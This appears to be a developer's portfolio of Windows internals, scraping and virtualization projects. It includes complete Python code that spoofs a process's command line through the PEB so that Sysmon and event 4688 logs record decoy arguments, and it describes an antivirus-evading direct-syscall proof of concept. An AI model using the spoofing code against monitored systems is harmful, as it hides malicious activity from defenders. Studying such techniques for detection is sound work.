This is a proof-of-concept project that issues syscalls directly instead of calling through the ntdll / kernel32 functions.
While this POC gets past the majority of antivirus software, it still falls flat under manual analysis. The next and inevitable step is to obfuscate the code, through dynamic library loading or other means.
I have really enjoyed working on this, and once again it feels like my most technical project so far. While this specific repo might die, I'll continue the general project, maybe under a different name.
After getting more involved with reversing, I got the idea to start this project. The goal is to allow text-editor-like editing of the assembly of running processes. There are better tools for memory manipulation, but I didn't find any that fit this specific niche. As a big plus, it's a great opportunity to learn more about processes on Windows.
As I began work on this, I also realized that I need to write better, Rust-like safe abstractions for the Windows API, which has been a side bonus of the project. Once I'm happy with the state of the code, I'll likely rip out the Windows API abstractions and move them to their own repo. I have definitely been enjoying these more technical projects.
Reading more about how processes work and seeing how Windows logs process events, I was curious whether I could spoof command line arguments on Windows.
My initial idea was to pick one program, like PowerShell, and try to overwrite the command line arguments in the process's memory. After reading more about the PEB structure, I realized that I could make the spoofing work for any program, regardless of how it stores its command line arguments in memory, because every process reads its arguments from the PEB at startup. Now I've written the first version (with terrible formatting, of course). The tool starts a process suspended with bogus arguments, overwrites the command line stored in the PEB's process parameters, and then resumes execution.
It works, and I'm happy enough with it, although I'll rewrite the whole program once my Windows API abstractions are in better shape. This project helped me improve my understanding of how Windows and its API work.
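The sequence described above, written out as an added example (this is not the project's own code, which is in Rust). It is Windows x64 only and uses the x64 structure offsets (PEB+0x20 for ProcessParameters, RTL_USER_PROCESS_PARAMETERS+0x70 for CommandLine); the image path and argument strings in the `__main__` block are placeholders. The one check that matters in practice is the buffer size: CreateProcess allocates the CommandLine buffer to fit the decoy, so the decoy is padded to at least the length of the real line and the write is refused if it would exceed MaximumLength.

```python
"""Command line spoofing through the PEB (added example, not the project's code).

Windows x64 only, run from 64-bit Python. Creation-time logging (Sysmon event 1,
security event 4688) records the decoy; after ResumeThread, ntdll/kernelbase
initialise from the patched PEB, so GetCommandLineW() and argv see the real line.
"""
import ctypes
import struct
from ctypes import c_void_p, c_uint16, c_uint32, c_int32, c_size_t, c_wchar_p

PEB_PROCESS_PARAMETERS = 0x20        # PEB.ProcessParameters (x64)
RTL_PARAMS_COMMAND_LINE = 0x70       # RTL_USER_PROCESS_PARAMETERS.CommandLine (x64)
CREATE_SUSPENDED = 0x00000004
PROCESS_BASIC_INFORMATION_CLASS = 0


class UNICODE_STRING(ctypes.Structure):
    _fields_ = [("Length", c_uint16),          # bytes, without the NUL
                ("MaximumLength", c_uint16),   # bytes allocated behind Buffer
                ("Buffer", c_void_p)]


class PROCESS_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [("ExitStatus", c_void_p),      # NTSTATUS plus padding on x64
                ("PebBaseAddress", c_void_p), ("AffinityMask", c_void_p),
                ("BasePriority", c_void_p), ("UniqueProcessId", c_void_p),
                ("InheritedFromUniqueProcessId", c_void_p)]


class STARTUPINFOW(ctypes.Structure):
    _fields_ = [("cb", c_uint32), ("lpReserved", c_void_p), ("lpDesktop", c_void_p),
                ("lpTitle", c_void_p), ("dwX", c_uint32), ("dwY", c_uint32),
                ("dwXSize", c_uint32), ("dwYSize", c_uint32), ("dwXCountChars", c_uint32),
                ("dwYCountChars", c_uint32), ("dwFillAttribute", c_uint32),
                ("dwFlags", c_uint32), ("wShowWindow", c_uint16), ("cbReserved2", c_uint16),
                ("lpReserved2", c_void_p), ("hStdInput", c_void_p),
                ("hStdOutput", c_void_p), ("hStdError", c_void_p)]


class PROCESS_INFORMATION(ctypes.Structure):
    _fields_ = [("hProcess", c_void_p), ("hThread", c_void_p),
                ("dwProcessId", c_uint32), ("dwThreadId", c_uint32)]


def pad_decoy(decoy, real):
    """The kernel sizes the CommandLine buffer to the decoy, so the decoy must be
    at least as long as the real line for the later overwrite to fit."""
    return decoy.ljust(len(real))


def encode_command_line(real, maximum_length):
    """UTF-16LE bytes (with NUL) for the real line, or None if it would not fit
    in the target's MaximumLength bytes."""
    data = (real + "\0").encode("utf-16-le")
    return data if len(data) <= maximum_length else None


def spawn_spoofed(image, decoy_args, real_args):
    """Start `image` so creation-time logs show decoy_args while the process
    itself parses real_args. Returns the new PID."""
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    ntdll = ctypes.WinDLL("ntdll")
    k32.CreateProcessW.argtypes = [c_wchar_p, c_wchar_p, c_void_p, c_void_p, c_int32,
                                   c_uint32, c_void_p, c_wchar_p, c_void_p, c_void_p]
    k32.ReadProcessMemory.argtypes = [c_void_p, c_void_p, c_void_p, c_size_t, c_void_p]
    k32.WriteProcessMemory.argtypes = [c_void_p, c_void_p, c_void_p, c_size_t, c_void_p]
    k32.ResumeThread.argtypes = [c_void_p]
    k32.CloseHandle.argtypes = [c_void_p]
    ntdll.NtQueryInformationProcess.argtypes = [c_void_p, c_int32, c_void_p, c_uint32, c_void_p]

    real = f'"{image}" {real_args}'
    decoy = pad_decoy(f'"{image}" {decoy_args}', real)
    si, pi = STARTUPINFOW(), PROCESS_INFORMATION()
    si.cb = ctypes.sizeof(si)
    cmd = ctypes.create_unicode_buffer(decoy)   # CreateProcessW may write into this buffer
    if not k32.CreateProcessW(None, cmd, None, None, 0, CREATE_SUSPENDED, None, None,
                              ctypes.byref(si), ctypes.byref(pi)):
        raise ctypes.WinError(ctypes.get_last_error())

    def read(addr, ctype):
        out, n = ctype(), c_size_t()
        if not k32.ReadProcessMemory(pi.hProcess, addr, ctypes.byref(out), ctypes.sizeof(out), ctypes.byref(n)):
            raise ctypes.WinError(ctypes.get_last_error())
        return out

    def write(addr, data):
        buf, n = ctypes.create_string_buffer(data, len(data)), c_size_t()
        if not k32.WriteProcessMemory(pi.hProcess, addr, buf, len(data), ctypes.byref(n)):
            raise ctypes.WinError(ctypes.get_last_error())

    try:
        pbi, ret = PROCESS_BASIC_INFORMATION(), c_uint32()
        status = ntdll.NtQueryInformationProcess(pi.hProcess, PROCESS_BASIC_INFORMATION_CLASS,
                                                 ctypes.byref(pbi), ctypes.sizeof(pbi), ctypes.byref(ret))
        if status != 0:
            raise OSError(f"NtQueryInformationProcess failed: {status & 0xFFFFFFFF:#010x}")
        params = read(pbi.PebBaseAddress + PEB_PROCESS_PARAMETERS, c_void_p).value
        cmdline_addr = params + RTL_PARAMS_COMMAND_LINE
        ustr = read(cmdline_addr, UNICODE_STRING)
        data = encode_command_line(real, ustr.MaximumLength)
        if data is None:
            raise ValueError("real command line does not fit in the decoy's buffer")
        write(ustr.Buffer, data)                                # the new characters
        write(cmdline_addr, struct.pack("<H", len(data) - 2))   # Length excludes the NUL
        k32.ResumeThread(pi.hThread)
        return pi.dwProcessId
    finally:
        k32.CloseHandle(pi.hThread)
        k32.CloseHandle(pi.hProcess)


if __name__ == "__main__":   # placeholder image and arguments
    print(spawn_spoofed(r"C:\Windows\System32\cmd.exe", "/c echo benign", "/c echo spoofed"))
```

Anything that reads the PEB after the thread is resumed (Process Explorer, WMI's Win32_Process) sees the real line, so the decoy only fools consumers that capture the command line at creation time.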
I was looking for a way to download and archive huge sets of data from 4chan for a now-scrapped OSINT tool. This repository contains two different scrapers, one for desuarchive using BeautifulSoup and one for 4chan using the 4chan API. The repository also contains an offline 'reader' for the output of the desuarchive scraper. Thanks !irneh
I've been very interested in VMs for a while, not only from a theoretical side but also practically: how could I create a VM, what would the real-world uses be, and so on.
My first serious introduction to VMs (aside from reading about them) was building a single-GPU-passthrough virtual machine. The goal was to play VR games without installing Windows on bare metal. I succeeded, and was able to play VR games with Windows running as a virtual machine. This gave me a good taste of virtualization and definitely heightened my interest in it.
Now, exactly a year later, having seen how VDI and ESXi work at the University of Helsinki, I naturally wanted to build my own 'VM-on-demand' system instead of using Vagrant or another virtualization solution designed for this. My outline for the project was very simple: I connect over SSH to a port in a specified port range, a VM is created for me to mess around in until I log off, and then the VM is destroyed.
Originally I thought about writing a listener that would listen on the port, spin up the VM and forward traffic from the port to the VM. After thinking about this more, a few technical difficulties came to mind and I moved on to another idea, the current one.
At the moment the system works by having a 'gateway' VM node, a machine that only handles the initial connection and orchestrates the creation and destruction of VMs. The project is still very much in its infancy; I've written the current setup in bash and it works, but it's mostly a proof of concept. For now it's useful to me and has helped me learn QEMU/virsh better.
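One way to implement the gateway's per-connection handler, as an added example in Python rather than the project's own bash. Everything about the deployment is an assumption: sshd on the gateway listens on the on-demand ports and runs the script as a `ForceCommand` for them, a shut-off libvirt domain (`ondemand-base` here) is the clone source, and its image already has the gateway's SSH key authorized for the guest account. sshd's `SSH_CONNECTION` variable carries the local port the user connected to, which identifies the VM; the `virsh domifaddr` sample output is constructed for the parser.

```python
"""Per-connection handler for a VM-on-demand gateway (added example, not the
project's bash; domain, user and port names are assumptions).

Assumed sshd_config on the gateway:
    Port 22
    Port 2201
    Port 2202
    Match LocalPort 2201,2202
        ForceCommand /usr/local/bin/ondemand-session
sshd sets SSH_CONNECTION="client_ip client_port server_ip server_port".
"""
import os
import subprocess
import time

BASE_DOMAIN = "ondemand-base"   # assumed name of the shut-off template domain
GUEST_USER = "user"             # assumed account inside the template

# Constructed sample of `virsh domifaddr <name>` output, used only to show the parser.
SAMPLE_DOMIFADDR = (
    " Name       MAC address          Protocol     Address\n"
    "-------------------------------------------------------------------------------\n"
    " vnet0      52:54:00:aa:bb:cc    ipv4         192.168.122.45/24\n"
)


def vm_name(ssh_connection):
    """One VM per gateway port: 'ondemand-<server_port>'."""
    server_port = int(ssh_connection.split()[3])
    return f"ondemand-{server_port}"


def create_commands(name):
    """virt-clone/virsh invocations that bring the VM up from the template."""
    return [["virt-clone", "--original", BASE_DOMAIN, "--name", name, "--auto-clone"],
            ["virsh", "start", name]]


def destroy_commands(name):
    """Tear-down including the cloned disk, so nothing outlives the session."""
    return [["virsh", "destroy", name],
            ["virsh", "undefine", name, "--remove-all-storage"]]


def parse_domifaddr(output):
    """First IPv4 address in `virsh domifaddr` output, or None while DHCP is pending."""
    for line in output.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[2] == "ipv4":
            return fields[3].split("/")[0]
    return None


def run(argv, check=True):
    return subprocess.run(argv, check=check, capture_output=True, text=True).stdout


def wait_for_ip(name, timeout=120):
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        ip = parse_domifaddr(run(["virsh", "domifaddr", name], check=False))
        if ip:
            return ip
        time.sleep(2)
    raise TimeoutError(f"{name} got no address within {timeout}s")


def session(ssh_connection):
    """Create the VM, drop the user into it, destroy it when they log off."""
    name = vm_name(ssh_connection)
    try:
        for argv in create_commands(name):
            run(argv)
        ip = wait_for_ip(name)
        # The clone has a brand-new host key, so there is nothing to pin against;
        # the VM exists only on the gateway's private bridge for this session.
        subprocess.call(["ssh", "-o", "StrictHostKeyChecking=no",
                         "-o", "UserKnownHostsFile=/dev/null", f"{GUEST_USER}@{ip}"])
    finally:
        for argv in destroy_commands(name):   # runs on logoff and on any failure above
            run(argv, check=False)


if __name__ == "__main__":
    session(os.environ.get("SSH_CONNECTION", "0.0.0.0 0 0.0.0.0 0"))
```

The `finally` block is the part worth keeping whatever language this ends up in: if `virt-clone` or the address wait fails, the half-created domain and its disk are still removed, and because the VM name is derived from the port, a stale domain from an earlier crash makes the next `virt-clone` on that port fail loudly instead of silently reusing it.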
As I've been reading up on the history of the internet and learning about different protocols from their RFCs, I got annoyed at having to open a browser, search for an RFC number, open the page and then read the RFC there.
My solution was simple: a short Python script that downloads and displays any RFC on the command line.